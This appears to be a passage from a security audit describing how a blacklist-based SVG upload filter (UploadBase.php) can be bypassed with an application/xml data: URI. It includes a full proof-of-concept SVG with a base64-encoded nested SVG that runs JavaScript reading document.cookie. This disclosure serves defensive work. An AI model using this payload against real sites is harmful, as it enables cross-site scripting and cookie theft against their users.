When uploading an SVG file, it is possible to bypass the validation filters and upload an
SVG file that executes JavaScript when rendered. The SVG validation is a blacklist-based approach and
contains protections against numerous techniques for embedding JavaScript in SVG files; however, the
protections against nested SVG files are inadequate due to a missing MIME type blacklist. Specifically,
data: URIs with the image/svg or text/xml formats are blacklisted, but the application/xml MIME
type is sufficient to create a nested SVG file with JavaScript code.
# /includes/upload/UploadBase.php
# href with embedded svg as target
if ($stripped == 'href' && preg_match( '!data:[^,]*image/svg[^,]*,!sim', $value)){
wfDebug( __METHOD__ . ": Found href to embedded svg "
. "\"<$strippedElement '$attrib'='$value '...\" in uploaded file.\n" );
return true;}
# href with embedded (text/xml) svg as target
if ( $stripped == 'href' && preg_match( '!data:[^,]*text/xml[^,]*,!sim', $value)){
wfDebug( __METHOD__ . ": Found href to embedded svg "
. "\"<$strippedElement '$attrib'='$value '...\" in uploaded file.\n" );
return true;}
Listing 1: Blacklist filtering for data: URIs with specific MIME types.
The following example SVG file contains a nested SVG file embedded within a data: URI. The nested
SVG file contains executable JavaScript.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="data:application/xml;base64 ,
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5r
PSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4KPGRlZnM+CjxjaXJjbGUgaWQ9InRlc3QiIHI9I
jUwIiBjeD0iMTAwIiBjeT0iMTAwIiBzdHlsZT0iZmlsbDogI0YwMCI+CjxzZXQgYXR0cmlidXRlTm
FtZT0iZmlsbCIgYXR0cmlidXRlVHlwZT0iQ1NTIiBvbmJlZ2luPSdhbGVydChkb2N1bWVudC5jb29r
aWUpJwpvbmVuZD0nYWxlcnQoIm9uZW5kIiknIHRvPSIjMDBGIiBiZWdpbj0iMXMiIGR1cj0iNXMiIC
8+CjwvY2lyY2xlPgo8L2RlZnM+Cjx1c2UgeGxpbms6aHJlZj0iI3Rlc3QiLz4KPC9zdmc+#test"/>
</svg>
Listing 2: Specially-crafted SVG file with a nested SVG file containing executable JavaScript code.
During testing, this exploit was only confirmed against the Firefox browser. Testing indicates that other
browsers do not support nested SVG files